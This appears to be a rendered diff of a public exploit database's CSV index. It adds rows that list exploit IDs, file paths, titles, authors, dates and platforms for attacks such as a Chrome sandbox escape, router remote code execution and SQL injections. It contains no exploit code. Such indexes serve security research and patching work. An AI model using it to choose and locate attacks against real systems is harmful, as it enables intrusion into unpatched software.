44269,exploits/windows/local/44269.txt,"Chrome 35.0.1916.153 - Sandbox Escape / Command Execution",2017-10-14,649,local,windows,
|
||||
44270,exploits/windows/local/44270.txt,"WebLog Expert Enterprise 9.4 - Authentication Bypass",2018-03-09,hyp3rlinx,local,windows,
|
||||
44279,exploits/linux/local/44279.py,"SC 7.16 - Stack-Based Buffer Overflow",2018-03-12,"Juan Sacco",local,linux,
|
||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||
|
@ -16064,6 +16065,7 @@ id,file,description,date,author,type,platform,port
|
|||
43411,exploits/windows/remote/43411.rb,"HP Mercury LoadRunner Agent magentproc.exe - Remote Command Execution (Metasploit)",2018-01-01,Metasploit,remote,windows,54345
|
||||
43412,exploits/unix/remote/43412.rb,"Cambium ePMP1000 - 'ping' Shell via Command Injection (Metasploit)",2018-01-01,Metasploit,remote,unix,
|
||||
43413,exploits/cgi/remote/43413.rb,"Cambium ePMP1000 - 'get_chart' Shell via Command Injection (Metasploit)",2018-01-01,Metasploit,remote,cgi,
|
||||
44275,exploits/windows/remote/44275.txt,"DEWESoft X3 SP1 (64-bit) - Remote Command Execution",2018-03-12,hyp3rlinx,remote,windows,
|
||||
43428,exploits/hardware/remote/43428.py,"Iopsys Router - 'dhcp' Remote Code Execution",2017-12-23,neonsea,remote,hardware,
|
||||
43429,exploits/hardware/remote/43429.rb,"Linksys WVBR0-25 - User-Agent Command Execution (Metasploit)",2018-01-04,Metasploit,remote,hardware,
|
||||
43430,exploits/linux/remote/43430.rb,"Xplico - Remote Code Execution (Metasploit)",2018-01-04,"Mehmet Ince",remote,linux,9876
|
||||
|
@ -16318,6 +16320,7 @@ id,file,description,date,author,type,platform,port
|
|||
44242,exploits/android/remote/44242.md,"Papenmeier WiFi Baby Monitor Free & Lite < 2.02.2 - Remote Audio Record",2018-02-25,iamrastating,remote,android,
|
||||
44245,exploits/hardware/remote/44245.rb,"NETGEAR - 'TelnetEnable' Magic Packet (Metasploit)",2018-03-05,Metasploit,remote,hardware,23
|
||||
44253,exploits/hardware/remote/44253.py,"Tenda AC15 Router - Unauthenticated Remote Code Execution",2018-02-14,"Tim Carrington",remote,hardware,
|
||||
44280,exploits/multiple/remote/44280.rb,"Eclipse Equinoxe OSGi Console - Command Execution (Metasploit)",2018-03-12,Metasploit,remote,multiple,
|
||||
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
||||
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
||||
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
|
||||
|
@ -38743,6 +38746,7 @@ id,file,description,date,author,type,platform,port
|
|||
42971,exploits/php/webapps/42971.rb,"Trend Micro OfficeScan 11.0/XG (12.0) - Remote Code Execution (Metasploit)",2017-10-11,"Mehmet Ince",webapps,php,
|
||||
42972,exploits/php/webapps/42972.rb,"Trend Micro InterScan Messaging Security (Virtual Appliance) - 'Proxy.php' Remote Code Execution (Metasploit)",2017-10-11,"Mehmet Ince",webapps,php,
|
||||
42975,exploits/linux/webapps/42975.txt,"Trend Micro Data Loss Prevention Virtual Appliance 5.2 - Path Traversal",2017-10-11,"Leonardo Duarte",webapps,linux,
|
||||
44274,exploits/java/webapps/44274.rb,"ManageEngine Applications Manager 13.5 - Remote Code Execution (Metasploit)",2018-03-12,"Mehmet Ince",webapps,java,
|
||||
42978,exploits/php/webapps/42978.txt,"OctoberCMS 1.0.425 (Build 425) - Cross-Site Scripting",2017-10-12,"Ishaq Mohammed",webapps,php,
|
||||
42979,exploits/php/webapps/42979.txt,"E-Sic Software livre CMS - 'q' SQL Injection",2017-10-12,"Guilherme Assmann",webapps,php,
|
||||
42980,exploits/php/webapps/42980.txt,"E-Sic Software livre CMS - Autentication Bypass",2017-10-12,"Elber Tavares",webapps,php,
|
||||
|
@ -38973,6 +38977,7 @@ id,file,description,date,author,type,platform,port
|
|||
44172,exploits/php/webapps/44172.txt,"Groupon Clone Script 3.0.2 - Cross-Site Scripting",2018-02-22,"Prasenjit Kanti Paul",webapps,php,
|
||||
44185,exploits/php/webapps/44185.txt,"Schools Alert Management Script 2.0.2 - Authentication Bypass",2018-02-27,"Prasenjit Kanti Paul",webapps,php,
|
||||
44186,exploits/php/webapps/44186.txt,"MyBB My Arcade Plugin 1.3 - Cross-Site Scripting",2018-02-27,0xB9,webapps,php,
|
||||
44276,exploits/multiple/webapps/44276.txt,"Prisma Industriale Checkweigher PrismaWEB 1.21 - Hard-Coded Credentials",2018-03-12,LiquidWorm,webapps,multiple,
|
||||
44191,exploits/php/webapps/44191.txt,"School Management Script 3.0.4 - Authentication Bypass",2018-02-27,"Samiran Santra",webapps,php,
|
||||
44192,exploits/php/webapps/44192.txt,"CMS Made Simple 2.1.6 - Remote Code Execution",2018-02-27,"Keerati T.",webapps,php,
|
||||
44194,exploits/php/webapps/44194.py,"Concrete5 < 8.3.0 - Username / Comments Enumeration",2018-02-27,"Chapman Schleiss",webapps,php,
|
||||
|
@ -38987,3 +38992,6 @@ id,file,description,date,author,type,platform,port
|
|||
44261,exploits/php/webapps/44261.txt,"Redaxo CMS Addon MyEvents 2.2.1 - SQL Injection",2018-03-07,h0n1gsp3cht,webapps,php,80
|
||||
44262,exploits/java/webapps/44262.txt,"antMan 0.9.0c - Authentication Bypass",2018-03-07,"Joshua Bowser",webapps,java,3000
|
||||
44272,exploits/php/webapps/44272.txt,"Bacula-Web < 8.0.0-rc2 - SQL Injection",2018-03-09,"Gustavo Sorondo",webapps,php,
|
||||
44277,exploits/php/webapps/44277.txt,"TextPattern 4.6.2 - 'qty' SQL Injection",2018-03-12,"Manuel García Cárdenas",webapps,php,
|
||||
44278,exploits/windows/webapps/44278.py,"Advantech WebAccess < 8.3 - Directory Traversal / Remote Code Execution",2018-03-12,"Chris Lyne",webapps,windows,
|
||||
44281,exploits/windows/webapps/44281.txt,"ACL Analytics 11.X - 13.0.0.579 - Arbitrary Code Execution",2018-03-12,Clutchisback1,webapps,windows,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue